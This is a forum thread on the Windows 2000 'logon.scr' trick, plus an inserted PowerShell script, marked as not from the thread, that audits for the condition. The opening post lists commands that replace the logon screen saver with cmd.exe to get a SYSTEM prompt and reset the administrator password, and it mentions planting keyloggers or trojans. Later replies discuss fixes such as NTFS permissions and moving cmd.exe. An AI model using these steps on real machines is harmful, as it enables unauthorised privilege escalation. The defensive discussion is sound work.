
Thread: Windows logon.scr hack

  1. #1
    Junior Member (Join Date Jan 2002, Posts 11)

    Windows logon.scr hack

    This is a tip that was posted in this forum for recovering a win2k admin password.

    Here, try this:
    If you can log in as an account and it is FAT, drop to DOS (Start -> Run -> cmd); at the C: prompt type the following (assuming default install locations):

    C:\> cd \winnt\system32
    C:\winnt\system32> copy logon.scr logon.scr.old
    C:\winnt\system32> del logon.scr
    C:\winnt\system32> copy cmd.exe logon.scr

    Now log off the machine. logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just type
    C:\> net user administrator <newpassword>
    and then log in with the new account.

    Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.
    Let me know if this works.
    Heavy_Deisel

    I tried this out on my work PC. The command prompt came up as advertised. Though I received an "access is denied" error when I tried to change the administrator password or add a new local user, I was able to run regedit.exe and had permissions to modify the registry! I was also able to launch both applications (lotus notes and word) and mmc programs like the group policy editor (gpedit.msc) and Computer management (compmgmt.msc). I haven't really explored what could be done with this hack but it would be pretty easy to install a keystroke logger or a trojan to exploit this weakness. Does anybody have any suggestions for closing this loophole? I know the most obvious is to use NTFS and enforce permissions on files like logon.scr but my bosses insisted that we use FAT32 in order to be able to easily recover data in case of system crashes. I would also be curious as to how someone might use this exploit to gain local administrator access (outside of using a keystroke logger.) Any thoughts? Props out to Mickey05 and Heavy_Diesel for turning me on to this hack. Thanks.
    Humans are the weakest link in the computer security chain...
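    A defender's check for the condition described in this post, added here as an example and not taken from the thread: a PowerShell audit that reports whether logon.scr has been replaced by a copy of cmd.exe and whether non-administrators could do so. It assumes a current Windows system with PowerShell 4 or later (for Get-FileHash), a default install under $env:SystemRoot, and the standard HKEY_USERS\.DEFAULT\Control Panel\Desktop key for the logon desktop's screen saver.

```powershell
# Added example, not from the thread: audit the logon screen saver for the
# "cmd.exe copied over logon.scr" condition and for the permissions that allow it.
# Assumes PowerShell 4+ (Get-FileHash) and a default install under $env:SystemRoot.
function Test-LogonScreenSaver {
    $sys32 = Join-Path $env:SystemRoot 'System32'
    $scr   = Join-Path $sys32 'logon.scr'
    $cmd   = Join-Path $sys32 'cmd.exe'
    $findings = @()

    # The .DEFAULT hive governs the logon desktop; report which screen saver it runs
    # so the auditor knows which file to watch.
    $desk = Get-ItemProperty 'Registry::HKEY_USERS\.DEFAULT\Control Panel\Desktop' -ErrorAction SilentlyContinue
    if ($desk -and $desk.'SCRNSAVE.EXE') { $findings += "logon screen saver configured as $($desk.'SCRNSAVE.EXE')" }

    if (-not (Test-Path $scr)) { return $findings + 'logon.scr not present in System32' }

    # 1. Identical bytes: the file is literally a copy of cmd.exe.
    $scrHash = (Get-FileHash -Algorithm SHA256 -Path $scr).Hash
    $cmdHash = (Get-FileHash -Algorithm SHA256 -Path $cmd).Hash
    if ($scrHash -eq $cmdHash) { $findings += 'logon.scr is byte-identical to cmd.exe' }

    # 2. A renamed binary keeps its embedded version resource; a genuine screen
    #    saver reports an OriginalFilename ending in .scr.
    $orig = (Get-Item $scr).VersionInfo.OriginalFilename
    if ($orig -and $orig -notmatch '\.scr$') { $findings += "version resource OriginalFilename is '$orig', not a .scr" }

    # 3. File ACLs exist only on NTFS. On FAT/FAT32 anyone who can log on can
    #    overwrite the file, which is the root cause discussed in the thread.
    $disk = Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='$env:SystemDrive'"
    if ($disk.FileSystem -ne 'NTFS') {
        $findings += "system volume is $($disk.FileSystem): no file permissions to enforce"
    } else {
        $modify = [System.Security.AccessControl.FileSystemRights]'Write, Delete, TakeOwnership, ChangePermissions'
        foreach ($ace in (Get-Acl $scr).Access) {
            $privileged = $ace.IdentityReference -match 'Administrators|SYSTEM|TrustedInstaller'
            $canModify  = ([int]($ace.FileSystemRights -band $modify)) -ne 0
            if ($ace.AccessControlType -eq 'Allow' -and -not $privileged -and $canModify) {
                $findings += "$($ace.IdentityReference) can modify or delete logon.scr ($($ace.FileSystemRights))"
            }
        }
    }
    return $findings
}

$result = Test-LogonScreenSaver
if ($result) { $result | ForEach-Object { Write-Output "FINDING: $_" } }
else { Write-Output 'logon.scr looks intact and protected' }
```

    The hash comparison catches the exact swap from the tip above; the version-resource and ACL checks catch a renamed copy of a different shell and the permissions that would let a user perform the swap in the first place.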

  2. #2
    Remove del rights from logon.scr and you should be safe again.
    who knows?

  3. #3
    Junior Member (Join Date Jan 2002, Posts 11)
    Our systems use FAT32, not NTFS.
    Humans are the weakest link in the computer security chain...

  4. #4
    Senior Member (Join Date Jan 2002, Posts 218)
    All of the systems I administrate at the air force base use NTFS. For a while I always installed it as my choice, but it is now a requirement by the DoD. FAT file systems are pretty much obsolete, and any system running 2000 Pro or XP should be installed with NTFS to optimize all of the operating system's options and security controls. Not that MS will ever be secure or stable, but NTFS is slightly better from what I can tell.

  5. #5
    Senior Member (Join Date Nov 2001, Posts 1,255)
    Well, you could always reboot the box with a DOS 6.22+ boot disk, then modify the files, that way Win2K isn't there at all to get in the way.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    "Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  6. #6
    Senior Member (Join Date Jan 2002, Posts 682)
    we use FAT32 in order to be able to easily recover data in case of system crashes.

    yer bosses are weenies... (they ever heard of backups???)

    the whole point of security procedures is to make things harder...and yes..that sometimes means it's harder for everyone...i've got 30 people here i have to give out new 12 digit complex passwords for them to remember..that's not easy...for them or me...but it is secure-(er)...i could give everyone a pwd like.."password"...real easy to remember..but...

    ntfs is far superior in many ways...including the fact that it is quite a bit more fault tolerant (so your data is actually less likely to get fu-ed in the first place)...you can also use EFS to encrypt sensitive data...of course that's really hard to get back if you don't have a system in place...

    soooo..

    have systems in place...go ntfs...or be unsecure...know that you can get your data easily...but so can anyone else...
    "I used to be With IT. But then they changed what IT was. Now what I'm with isn't IT, and what's IT seems scary and weird." - Abe Simpson

  7. #7
    souleman, AntiOnline Senior Member (Join Date Oct 2001, Location Flint, MI, Posts 2,883)
    You could probably just rename cmd.exe to something else. Not many people have any need to use it, other than the admins. So if you renamed it to prompt.exe, and only let the admins know it, you will probably be safe. Most people who know about the hole are not going to take time to find what you renamed it. They will just be like "Oh wow, no cmd.exe, gotta find a different script." You could also move cmd.exe so it is in a location that is not in the users' path: only the Administrators' path, or no path at all. So you will have to type c:\progs\cmd.exe to start it, or something along those lines.
    "Ignorance is bliss....
    but only for your enemy"
    -- souleman

  8. #8
    Junior Member (Join Date Jan 2002, Posts 11)

    Originally posted here by zigar:
    yer bosses are weenies...

    That sums it up quite nicely.

    I'd trade you to support only 30 users. My team supports over 4000 desktops in over 40 locations! My company likes to talk like security is important, but when it comes down to it, we choose convenience over security every time.

    Thanks for the idea Souleman. Moving CMD.EXE is the simple solution I was looking for...
    Humans are the weakest link in the computer security chain...

  9. #9
    Junior Member (Join Date Nov 2001, Posts 27)
    But if you move the cmd.exe program, another attempt at success that I can think of would be to run a system with NT already and just upload a cmd.exe and rename it to logon.scr.
    If that's an off-the-wall suggestion, excuse me, 'cause I'm not very familiar with NT... never liked it... this bug is an example why, heh.
    all work and no play makes bios a dull boy

  10. #10
    Junior Member (Join Date Jan 2002, Posts 11)
    That's a good point, bios. The problem here is not so much NT, because using NTFS would greatly reduce the risk that this hack could be implemented.
    Humans are the weakest link in the computer security chain...
